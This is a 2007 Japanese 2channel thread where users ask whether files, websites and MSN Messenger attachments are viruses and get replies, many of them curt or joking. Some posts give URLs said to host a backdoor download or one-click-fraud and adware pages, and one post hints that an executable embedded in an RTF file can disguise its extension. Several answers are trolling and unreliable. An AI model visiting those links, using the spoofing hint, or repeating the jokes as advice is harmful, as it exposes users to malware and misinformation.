>>596
そんなもん
「あんたやあるまいし、使うもんはちゃんとチェックくらいしとるわドアホ」て
ゆ〜たり
>ネットで取り込んだ
ウィルス入りなら画像開いた時点で感染済やわw

598 名前:名無しさん@お腹いっぱい。 [2007/08/02(木) 00:01:24 ]
>>597

ですね。言っときます!ありがとうでした^^

599 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/02(木) 00:03:15 ]
お、頑張り

600 名前:名無しさん@お腹いっぱい。 [2007/08/02(木) 02:51:21 ]
ノートンのウイルス駆除ソフト「ノートンアンチウイルス2006」なんですが、
前回更新してから1年が経ちます。そこで質問なんですが、
更新期限が過ぎても更新しなかった場合、

@最新のウイルスに対応するアップデートが出来なくなるだけで、
  ソフト自体は使えるんですか?

Aそれともタイマーみたいなのが仕込まれてて、
  更新しなければいかなる場合でも使用できなくなるんですか?

どっちですか?




601 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/02(木) 03:05:23 ]
>>600
  ∧,,∧       1だよ!
 (;`・ω・)  。・゚ ・ 
 /   o━ヽニニフ)) 
 しー-J 

602 名前:名無しさん@お腹いっぱい。 [2007/08/02(木) 03:24:34 ]
ノートンアンチウイルス2005をパターン更新して使ってるんですが
2007に変えると何か劇的な変化とかあるんでしょうか?

603 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/02(木) 04:10:15 ]
すぐ彼女が出来る ! !

604 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/02(木) 04:10:35 ]
>>602
スレ違い

【ノートン】Norton Internet Security Ver.117【2007】
pc11.2ch.net/test/read.cgi/sec/1185988933/

605 名前:名無しさん@お腹いっぱい。 [2007/08/02(木) 17:09:32 ]
>>601さんdクス!

だとするならどうでしょうね?ウイルスなんて古いものばかりのようなイメージがあるのですが・・
しかも2年間ウイルスもブラクラも踏んでないし・・・更新料5000円もったいない?

606 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/02(木) 17:22:07 ]
>>605
ウィルス定義ファイルならサイトでDL

607 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/02(木) 19:37:34 ]
>>605
泣かない自信と、賠償請求に応じられる財力があるなら、お好きにどうぞ。

608 名前:名無しさん@お腹いっぱい。 [2007/08/02(木) 21:10:59 ]
【使用OS】2000
【Microsoft Updateの状態】 最新
【使用セキュリティソフトとバージョン】 avst
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】 spy-bot ad-ware 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 最新
【ルータの有無】 有り
【症状】 AntiVirでスキャンしたら『SpoonUninstall.exe』っていうのが見つかりました。

調べても何をするものか分からないのでどなたかご教授願います・・・。

609 名前:名無しさん@お腹いっぱい。 [2007/08/02(木) 21:17:09 ]
>>608の【使用セキュリティソフトとバージョン】はAntiVirでした。
すいません。

610 名前:名無しさん@お腹いっぱい。 [2007/08/03(金) 00:24:05 ]
uninstall_flash_player.exeをFlashの日本語ページで落とすと、言語のプロパティが韓国語になるのですが
同じような現象出た人いますか?



611 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/03(金) 00:32:07 ]



612 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/03(金) 10:18:47 ]
スレチだと思いますが携帯にもウィルスってあるんでしょうか…?
板が分からなかったのですみません

613 名前:名無しさん@お腹いっぱい。 [2007/08/03(金) 13:29:49 ]
>>611
ノシ

614 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/03(金) 13:58:19 ]
>>612
あるよ。

615 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/03(金) 21:26:59 ]
原田踏んだ・・・
すぐ電源落として再起動をかけたら、とりあえずWinny以外のフォルダには特に影響がなかったみたいです。
Program Filesフォルダは中身が無事だったもので。
ただし同フォルダ一番下のUninstall_CDS.exeのアイコンが例の画像に変わってます。
これをどうにかできませんかね?

616 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/03(金) 21:29:21 ]
追記
というか、このファイルは原田感染後に出てきたもの?

617 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/03(金) 21:33:23 ]
立ち去れ

618 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/03(金) 21:59:28 ]
すいません。テンプレ読んでませんでした。
【使用OS】WindowsXP Professional
【Microsoft Update(MU)の状態】つい最近行ったので、恐らく最新
【使用セキュリティソフトとバージョン】Norton Internet Security2007(バージョン10.0.0.86)
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最新
【スパイウェア対策ソフト】なし
【スパイウェア対策ソフトの更新は定期的に行なっているか】ないのでやってない
【ルータの有無】有

現在システムの完全スキャン中なので、結果は後ほど載せます

619 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/03(金) 22:08:31 ]
書き換えられたファイルはどうにもならない
以上

620 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/03(金) 22:17:25 ]
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
低レベルのTracking Cookieを検出したと表示されていましたが、これはずっと以前からあったもので、
今回の件には関係ないものだと思われます。それ以外は特になし。
【どんな症状が出るか】さきほども言ったように、Uninstall_CDS.exeのアイコンが例の画像になってました。
Winnyはフォルダの内容がのほとんどが例の画像や拡張子が.bmpに変えられたものばかりになっていた。
他のファイルももちろん調べましたが、例の画像を含んだフォルダや、
拡張子がBMPに変えられたファイルを含んだフォルダはなし。
【症状が出る前に何をやったか】nyで落とした動画ファイル(ひぐらしのなく頃に解 第4話)を見ようとしていた。
                    恐らくそれが原因。拡張子が.exeか.scrだったものと思われる。
【症状を解決しようとどのような処置を取ったか】まずWinnyフォルダをまとめて削除。後にNortonによる完全スキャン。
【その他の質問】Uninstall_CDS.exeがこうなった以上、OS再インスコしかないのでしょうか?




621 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/03(金) 23:28:44 ]
>>615
>>13

スレ違いです

622 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/04(土) 23:29:05 ]
ノートンの更新期限が切れたんだけど、更新延長のウインドウがパソコンを起動する度に表示され、
他にも不定期に表示される様になり、ウザイったらありゃしない。今まで使ってきた感想を言うと、
ノートン自体がウイルスでした。今度買うときはウイルスバスターにします

623 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/05(日) 01:24:38 ]
漫才師になれるぞ。

624 名前:名無しさん@お腹いっぱい。 [2007/08/05(日) 16:14:52 ]
突然質問してすみません。
あるサイトにつなげたら、ウインドウズの画面がそっくりそのまま横になってしまったのですが、
元に戻すにはどうしたらよいのでしょうか?

625 名前:名無しさん@お腹いっぱい。 [2007/08/05(日) 16:21:36 ]
笑うところだよな?

626 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/05(日) 16:25:23 ]
>>624
スレ違い
Ctrl + Alt + ↑

627 名前:名無しさん@お腹いっぱい。 [2007/08/05(日) 16:28:10 ]
なおりました!!本当にありがとうございました!!

628 名前:名無しさん@お腹いっぱい。 [2007/08/06(月) 01:27:47 ]
下記のサイトを見ると警告が出るのですがこれってウイルスですかね?
もしウイルスだったら店に知らせてあげて下さい。

萌えゲッチュ www.lemonades.jp/ 年齢認証(18歳以上)押すと
ワンピース www.onepiece-net.com/ 年齢認証(18歳以上)押すと
ツーピース www.twopiece-net.com/ 年齢認証(18歳以上)押すと
カジュアル www.ik-casual.net/

629 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/06(月) 02:47:51 ]
www.4563maturemovies.com/
このサイトのウイルスはどの様な悪影響を及ぼしますか?教えて下さい。

630 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/06(月) 11:06:38 ]
>>628
何のソフトが出した警告か書かないとわからんだろ
バスターのURLフィルタがアダルトサイト警告でも出したってオチは無しな

>>629
2005-searchのリンクがあるから
アドウェア(といってもほぼマルウェアに近い)のインストールじゃねえかな



631 名前:名無しさん@お腹いっぱい。 [2007/08/06(月) 15:13:19 ]
>>630

アンチウイルスではエラーメッセージ
ウイルスキラーでウイルス検出しましたという警告




632 名前:名無しさん@お腹いっぱい。 [2007/08/06(月) 15:14:02 ]
下記のサイトを見ると警告が出るのですがこれってウイルスですかね?
もしウイルスだったら店に知らせてあげて下さい。

萌えゲッチュ www.lemonades.jp/ 年齢認証(18歳以上)押すと


633 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/06(月) 15:27:34 ]
新手の広告か

634 名前:名無しさん@お腹いっぱい。 [2007/08/07(火) 14:07:01 ]
キーボードのiとeとoとuを押しても文字が打てないんですけど、これってウイルスですか?

635 名前:名無しさん@お腹いっぱい。 [2007/08/07(火) 14:14:52 ]
ki-bo-donoitoetootouwoositemomojikautenainndesukedo,koretteuirusudesuka?

636 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/07(火) 14:17:48 ]
>>634
クリーンリカバリー

637 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/07(火) 14:23:59 ]
クリーンリカバリー 

う〜む  難しいなぁ・・・

638 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/07(火) 14:27:05 ]
ググレカレー

639 名前:名無しさん@お腹いっぱい。 mailto:777 [2007/08/07(火) 14:35:50 ]
ttp://ddo-jp.ddo.jp/download.php?no=13340
ここで配布されている物バックドアみたいなんですが…
jsf.exe開いたらアウトですか?

640 名前:639 mailto:sage [2007/08/07(火) 14:37:54 ]
因みにウイルスバスター2006入れてますが、開いた時何も検出しませんでした…
トロイですかねぇ?



641 名前:名無しさん@お腹いっぱい。 [2007/08/07(火) 14:50:57 ]
クリーンリカバリーって??

642 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/07(火) 16:50:13 ]
>>639-640
既に落とせないから知らん。
どっかにアップし直してくれ。

643 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/07(火) 17:09:19 ]
>>642
すみませんが自分自身も削除してしまったので、再うpは無理です。
解決法も模索した物の、よく分からないのでOS入れなおして不安解消します。
お騒がせしました。

644 名前:名無しさん@お腹いっぱい。 [2007/08/07(火) 20:51:53 ]
ttp://www.girlsbar-chelsea.com/
上記のページ(ガールズバーのサイトです)を開いた際、
ノートンが反応し「疑わしいスクリプト」として遮断しました。
temporary internet filesを見たところ、norton.exeというファイルがあり、
とりあえずそれは消してしまいました。

現在ウイルススキャン中なのですが、これは既知のものでしょうか?
ファイル名でぐぐってみたのですが、該当するものがよくわかりませんでした。

645 名前:名無しさん@お腹いっぱい。 [2007/08/07(火) 21:38:30 ]
Adware Casinoにかかってしまいました

OSはXP セキュリティソフトはウイルスバスター14です
出来れば危険性や対策を教えてほしいです
お願いします

646 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/07(火) 22:39:54 ]
>>624>>626
そんな機能があるの初めて知ったよ。

647 名前:名無しさん@お腹いっぱい。 [2007/08/08(水) 01:52:12 ]
Windowsのノートパソコンです。
メール受信ボックスに英語で「私の事好き?」の件名で送信者はバージニアでした。
クリップみたいなのが件名の前についていて怖くて開けません。
最近PC初めたばかりで主にヤフオクとユウチュウブしか見てない超初心者です…どうしたら良いでしょうか?

648 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 02:30:21 ]
【使用OS】
 「Windows2000 Service Pack 4」
【Microsoft Update(MU)の状態】
 「今朝自動Windows Update済み」 
【使用セキュリティソフトとバージョン】 
「ウイルスバスター2007」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 
「パターン定義 4.637.00」 
【スパイウェア対策ソフト】
 「無し」 
【ルータの有無】
 「あり」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「ウィルススキャン未検出」

【どんな症状が出るか】 
「英文と共にウイルスが入ったZIPファイルをMSN Messengerのオンラインメンバー全員に送信を試みる。」
【症状が出る前に何をやったか】
 「look @ my pretty puppyと共に送られてきたファイルimg1756.zipを解凍し、中に入っていたimg1756.scrファイルを起動した」
【症状を解決しようとどのような処置を取ったか】 
「メッセンジャー強制終了、ウィルスバスター2007で完全スキャン、カペルスキーで、ウイルスファイルをスキャン」

649 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 02:39:42 ]
>>648 これやばいな
いろんな人から送られてきたから相当数が感染してるようだ
送信者全員感染してるでおk?

650 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 02:41:33 ]
>>649
さっき同じような感じで送られてきたぜ。
めちゃくちゃ怪しかったんでファイル受信拒否ったけど。



651 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 02:44:05 ]
>>649
送信者全員感染でOK
4人から似たような時間に送られてきて笑ったw

W32.Mubla.B
って名前で脳豚の定義ファイルは更新されてるな

652 名前:名無しさん@お腹いっぱい。 [2007/08/08(水) 02:44:33 ]
【使用OS】 Windows XP Pro
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】 Noton Internet Security バージョン10.2.0.30
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 Yes
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
なにも検索されていない

【どんな症状が出るか】 ファイルを開いた直後にMSNの窓が開かなくなる。MSNでオンライン中のアドレスに自動で同じファイルを送信する
【症状が出る前に何をやったか】 MSNで知人から
I just took this picture with my webcam, like it? 
 というメッセージとともに
img1756.zipというファイルが添付されていたのでノートンをかけたが異常無し
中身はスクリーンセーバのファイル。開くと上記のような上体になる
【症状を解決しようとどのような処置を取ったか】 再起動(再起動でMSNの窓は開くことができた)
 ノートンでウイルス検索、テンプレにあるオンラインスキャン実施
【その他の質問】 ファイル名でググると8月8日付けのブログでウイルスであることが判明
ここに至りますが、正直なにが起こっているのか全くわかりません
なにか詳しい情報や対策など教えていただきたいです

653 名前:sage [2007/08/08(水) 03:10:26 ]
>>649 652
www.symantec.com/ja/jp/security_response/writeup.jsp?docid=2007-080614-3458-99&tabid=2

それ程深刻なウィルスでは無いっぽい

654 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 03:52:41 ]
>>646
IntelのオンボVGAの機能。

655 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 12:56:48 ]


Messengerから感染するマルウェアが見つかった
pc11.2ch.net/test/read.cgi/software/1086995317/421





656 名前:名無しさん@お腹いっぱい。 [2007/08/08(水) 13:37:21 ]
PCからずっと「ピーーーー・・・・・……」と言う音が鳴っててうるさいんだけど、
これはウィルスの類ですか?

657 名前:名無しさん@お腹いっぱい。 [2007/08/08(水) 13:41:02 ]
ちゃんとテンプレで書きなおしました。

【使用OS】 「XP 多分ホームエディション」
【Microsoft Update(MU)の状態】 「ちゃんとやってる」 
【使用セキュリティソフトとバージョン】 「多分ファイヤーウォール」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「されてる」 
【スパイウェア対策ソフト】 「なし」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無いのでしてない」
【ルータの有無】 「ルータとは何ですか?」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「スキャンは今PC全体をやってみてる」

【どんな症状が出るか】 「PCから「ピー」と言う音が鳴り止まない」
【症状が出る前に何をやったか】 「winny」
【症状を解決しようとどのような処置を取ったか】 「winny閉じた。」
【その他の質問】 「これはウィルスですか?そうじゃないとしたら何ですか?」

658 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 14:13:35 ]
ネタにマジレス。

メモリ死亡。

659 名前:名無しさん@お腹いっぱい。 [2007/08/08(水) 16:22:34 ]
メモリ死亡ってなんですか?

660 名前:名無しさん@お腹いっぱい。 [2007/08/08(水) 16:26:20 ]
メモリがインポテンツになることだよ



661 名前:名無しさん@お腹いっぱい。 [2007/08/08(水) 16:32:51 ]
それって直らないんですか?

662 名前:名無しさん@お腹いっぱい。 [2007/08/08(水) 16:35:38 ]
下記のサイトを見ると警告が出るのですがこれってウイルスですかね?
もしウイルスだったら店に知らせてあげて下さい。

萌えdoru www.lemonades.jp/ 年齢認証(18歳以上)押すと
ワンピース www.onepiece-net.com/ 年齢認証(18歳以上)押すと
ツーピース www.twopiece-net.com/ 年齢認証(18歳以上)押すと
カジュアル www.ik-casual.net/




663 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 16:56:21 ]
>>662
ワンクリ乙

664 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 17:10:19 ]
【使用OS】 「WindowsXP Home edition」
【Microsoft Update(MU)の状態】 「最新」 
【使用セキュリティソフトとバージョン】 「Norton360」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」 
【スパイウェア対策ソフト】 「上と同じ」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「最新」
【ルータの有無】 「なし」
友人のMSNメッセンジャーから「img1756.zip」というファイルがおくられてきて、それを受信、解凍したうえで、出てきたファイルimg1756.srcをクリックしてしまいました
メッセンジャーが使用不能になったので、どうしたんだろ?と思いつつ再起動しました
再起動後、すぐに別の友人が「img1756.zip」についての情報を、流行ってるから気をつけろよと教えてくれたのですがどうやらウイルスのようです
シマンテックのホームページで確認したところ、昨日の時点で対策はとられてるようでした
しかし、自分のノートン360は8日にアップデートしていて最新版のはずなのに、問題のファイルを開く前も、開いたあとも、検出は一切されませんでした
何に問題があるのでしょうか?

665 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 18:11:44 ]
>>664
ノートン以外を使うといいよ

666 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 18:39:27 ]
>>664
同名のファイルで何種類か出回ってるとかいう話は聞いた

667 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 18:58:57 ]
>>664
.src じゃなくて .scr (スクリーンセーバー) だろうけど。

scrの中身はexeと一緒だからね。単に名前違うだけ。

668 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/08(水) 22:04:03 ]
>>648
そもそもなんで解凍するか理解不能。
英文の意味不明なメールを開く時点でイミフだけど。


669 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/09(木) 00:32:19 ]
メッセンジャー使ってる奴は皆そんなアホだよ。

670 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/09(木) 00:45:56 ]
外人の連絡相手の3人や4人いるだろ。



671 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/09(木) 09:32:23 ]
メールじゃなくてインスタントメッセージね。
ファイルはメッセンジャーの送信機能を使った物

672 名前:名無しさん@お腹いっぱい。 [2007/08/09(木) 14:44:17 ]
HTTP LOP Toolbar Activity←これは、なんなのですか?

673 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/10(金) 02:25:26 ]
>>672
どうぞttp://www.google.com/search?hl=ja&q=HTTP+LOP+Toolbar+Activity&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

674 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/10(金) 14:24:09 ]
【使用OS】 「XP SP2」
【Microsoft Update(MU)の状態】 「半年〜一年ほどやってません」 
【使用セキュリティソフトとバージョン】 「AntiVir パーソナルエディション」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「してます」 
【スパイウェア対策ソフト】 「spy bot,AD-Aware」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「スキャンの前だけ(常駐じゃない)」
【ルータの有無】 「あり」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「SOUNDMAN(これを消しても続いたので関係ない?)」

【どんな症状が出るか】 「ジェットコースターで叫んでるjpg画像がそれぞれ80個ほど
デスクトップ・マイドキュメント・マイピクチャに、PC起動ごとに出る
これがその画像ですttp://up.spawn.jp/file/up41105.jpg」
【症状が出る前に何をやったか】 「あやしいexeを開いた(消してしまった)」
【症状を解決しようとどのような処置を取ったか】 「ウイルス・スパイウェアのスキャン&削除」
【その他の質問】 「実害はないかも知れませんが、他のところでも悪さをしているかも・・・。
なんていうウィルスか、その対処法も教えて欲しいです」

675 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/10(金) 14:27:03 ]
【Microsoft Update(MU)の状態】 「半年〜一年ほどやってません」

今すぐやって出直せ。

676 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/10(金) 15:39:03 ]
>>675
やってきましたが、まだ出てきました・・・。

677 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/10(金) 20:51:51 ]
よかったね(^0^)/

678 名前:674 mailto:sage [2007/08/11(土) 20:00:25 ]
答えがでないようなのでほかのところでも質問してきます


679 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/17(金) 22:43:48 ]
[国+]【アメリカ・インターネット】Wikipediaの執筆者を暴露するツールが登場[08/16]
headline.2ch.net/test/read.cgi/bbynews/1187358066/

680 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/20(月) 09:12:31 ]
セキュリティ板@削除議論・自治スレッド
qb5.2ch.net/test/read.cgi/sakud/1090504381/

強制IDや強制リモホ表示の是非について投票募ってます。
ある程度意見溜まったら申請出しますのでご協力お願いします。
コピペで失礼しました。m(__)m



681 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/20(月) 15:55:55 ]


【悪質】もはや技術的に検出できないアンチウイルスも出てきた【多機能ウイルス】
pc11.2ch.net/test/read.cgi/software/1086995317/428




682 名前:名無しさん@お腹いっぱい。 mailto:age [2007/08/20(月) 19:44:11 ]
プログラムの追加と削除に IndicatourUtility てのがあるんですけど
ウイルスですか? 緑の太陽みたいなアイコンです

683 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/20(月) 20:45:53 ]
ttp://www.google.co.jp/search?hl=ja&q=%22IndicatorUtility%22

684 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/20(月) 21:32:30 ]
RTF埋め込み.exeは割と簡単に拡張子偽造できる。RLOは使えないけど。
IE6以前だと警告画面出ないらしいし。 
まあだけど普通は実行時に例の警告画面出るから気がつくとは思うけど。

685 名前:名無しさん@お腹いっぱい。 [2007/08/20(月) 23:42:09 ]
ウイルスに感染したら最終措置は初期化ですか?

686 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/21(火) 00:43:52 ]
神 PCを止める
上 初期化
並 駆除
貧 静観

687 名前:_ [2007/08/21(火) 05:34:47 ]
ttp://society6.2ch.net/test/read.cgi/koumei/1166498286/
すいません質問があります。
これは公明党のスレなんですけど、たまたまサッカーの板のスレに
貼り付けられていて、覗いてみたらすぐに画面の隣の方から
ウイルスに感染しましたという赤色のタグがでてきました。
スレを見ただけでウイルスに感染することなんてあるんですか?
それとも驚かせるつもりでウイルスもどきの仕掛けをしただけ?




688 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/21(火) 06:33:43 ]
バーカwwww

689 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/21(火) 10:26:50 ]
>687
これは釣りなのか、マジなのか、それとも釣るつもりなのか。
スレがスレだけに悩むな。

690 名前:687 [2007/08/21(火) 11:12:24 ]
ああ、すいません。スレには騙されて飛ばされたと書かれていますが
相談に関しては騙しではないです。

7 :あ:2007/08/21(火) 04:35:58 ID:eQSZJLJ+0
【サッカー】日本対カメルーン戦(九州石油ドーム)で地元大分出身の山崎ハコさんが日本一陰気な「君が代」を披露へ
society6.2ch.net/test/read.cgi/koumei/1166498286/

これです。これがサッカー板に貼り付けられていて、開いたんです。
公明党のスレだったんですけど、ウイルスが検出されましたというのが
でてきたんです。
試しにもう一度開いたところ、再び検出されました。
だけど今のは自動的に駆除されたようです。
昨日のは駆除されてません。ウイルスの名前はVBS/LoveLetter@MMというものです。





691 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/21(火) 19:00:56 ]
>>690
ノートントラップ
www.media-k.co.jp/jiten/wiki.cgi?%A1%E3%A4%CE%A1%E4#i7

692 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/22(水) 05:21:36 ]
>>690
お前、ここでマルチする前に他スレで丁寧に質問に答えてくれた鑑定人さんに
ちゃんとお礼したらどうなんだ?


693 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/22(水) 06:11:09 ]
初質で聞いていた奴か
放っておけ。馬鹿につける薬は無い

最後に、言うまでも無いことだとは思うが、
答えてくれた人達に礼の言葉を返すなど言語道断である。
せっかく「教えてクン」を貫いてきたのに、最後にお礼を言っているようでは、
画竜点睛を欠いていると言わざるを得ない。
質問だけしておいて、後はシカトが基本である。
ttp://www.redout.net/data/osietekun.html

694 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/23(木) 21:51:47 ]
★質問用テンプレ★
【使用OS】 「XP SP2」
【Microsoft Update(MU)の状態】 「最新かと」 
【使用セキュリティソフトとバージョン】 「ウイルスバスター2006」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新です」 
【スパイウェア対策ソフト】 「同上」 
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「有り」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「ファイル名: C:\WINDOWS\DOWNLO~1\jwdtabar.dll
ウイルス/スパイウェア名: ADW_CNSADD.Z (クリックで詳細情報を表示)



クリックしても詳細が表示されず、ググッても一件しかヒットせずしかも英語のただのテキストみたいでした
感染する前はIEでネットしたくらいです。
しかも  ファイルからウイルスが見つかりました。リアルタイム検索が有効なため、このファイルへのアクセスを拒否します。このウイルスは、手動で処理する必要があります

ってでたけどC:\WINDOWS\DOWNLOっていうフォルダが存在しないんでどうしようもありません
だれかどういう操作をしたら消せるのか教えてくだされ

695 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/23(木) 22:12:36 ]
>>694
jwdtabar.dllでググレ

696 名前:名無しさん@お腹いっぱい。 [2007/08/23(木) 23:22:26 ]
ウィルスセキュリティ0でウィルスが発見されたけど、
駆除できません。
駆除する方法を知っている方、教えてくれるとありがたいです
[ウィルスファイル]
C:\windows\system32\gebyyaa.dll


697 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/24(金) 03:56:13 ]
かなり初歩的な質問です。よくP2Pをやって個人画像流出っていう事件あるけど、当の本人達はウイルス対策がずさんだからこのような結果を招いたって事?
それとも対策はしてても防げなかったって事?

698 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/24(金) 07:21:06 ]
隣に橋が架かっていても
飛び越えてみる奴もいる
橋を見ないで泳ぐ奴も
やった本人に聞かないと
実際のところは判らない

699 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/24(金) 07:22:30 ]
>>697
>>13

700 名前:名無しさん@お腹いっぱい。 [2007/08/24(金) 22:17:23 ]
ウイルスチェキが分かりません?><
サイト?ソフト?教えてください



701 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/24(金) 22:28:59 ]
日本語でおk

702 名前:名無しさん@お腹いっぱい。 [2007/08/24(金) 22:40:01 ]
>>701
Oops!!!!!!
thank you ,your response.
but I have just solved my problem. XD

703 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/24(金) 23:25:07 ]
ワラシヨメナイアルネ

704 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/25(土) 00:40:55 ]
すいませんパソコン初心者です。
パソコンの電源が切れなくなったと思ったら画面が骸骨1つになってしまい動かなくなってしまいました。これはやっぱりウイルスですか?

705 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/25(土) 01:41:48 ]
>>704
釣りでもいいや…
>これはやっぱりウイルスですか?
そうで〜す。
P2P関係のウイルスはダウソで
tmp6.2ch.net/download/subback.html

706 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/25(土) 01:56:38 ]
何をやったらそうなったぐらい書けよ
どうせ違法行為だから書けないんだろうけど

707 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/25(土) 02:05:24 ]
ふ〜ん
ドクロまだ放流されてんだな。


708 名前:名無しさん@お腹いっぱい。 [2007/08/25(土) 02:08:26 ]
>>705
釣りじゃないです。ダウンですか…頑張って調べてみます。ありがとうございました。

>>706
すいません書き忘れてました。Cabosを使ってるのですがそれが原因でしょうか…

709 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/25(土) 02:18:29 ]
>>708
明らかにP2Pを介した感染は、セキュ板ではスルー。
ダウソ板いくか、とっととリカバリする。

ちなみにそのウイルスは初心者程度じゃ一切手に負えない。
ご愁傷様

710 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/25(土) 02:53:51 ]
色々調べた結果私には無理そうなのでリカバリすることにしました。スレ違いなのに皆さんありがとうございました!!



711 名前:名無しさん@お腹いっぱい。 mailto:sage [2007/08/26(日) 11:19:14 ]
【使用OS】 「WinXP SP2」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「なし」
【スパイウェア対策ソフト】 「Spybot 1.4」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「してない&さっきした」
【ルータの有無】 「あり」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
D:\4DB79B1C.exe は Infostealer.Gampass に感染しています。
D:\openjane_bu\Logs\2ch\ネットゲーム\ネトゲ実況2\1096907580.dat は VBS.Internal に感染しています。
C:\WINDOWS\system32\a.exe は Infostealer.Gampass に感染しています。
C:\WINDOWS\Help\4DB79B1C.chm は Infostealer.Gampass に感染しています。
C:\Program Files\Common Files\Microsoft Shared\MSInfo\4DB79B1C.dat は Infostealer.Gampass に感染しています。
C:\Program Files\Common Files\Microsoft Shared\MSInfo\4DB79B1C.dll は W32.Condown.A に感染しています。
(シマンテック社のオンラインウィルススキャンによる)

【どんな症状が出るか】 「PCが重い。フォルダオプションで「ファイルを全て表示」にしても、表示されない。
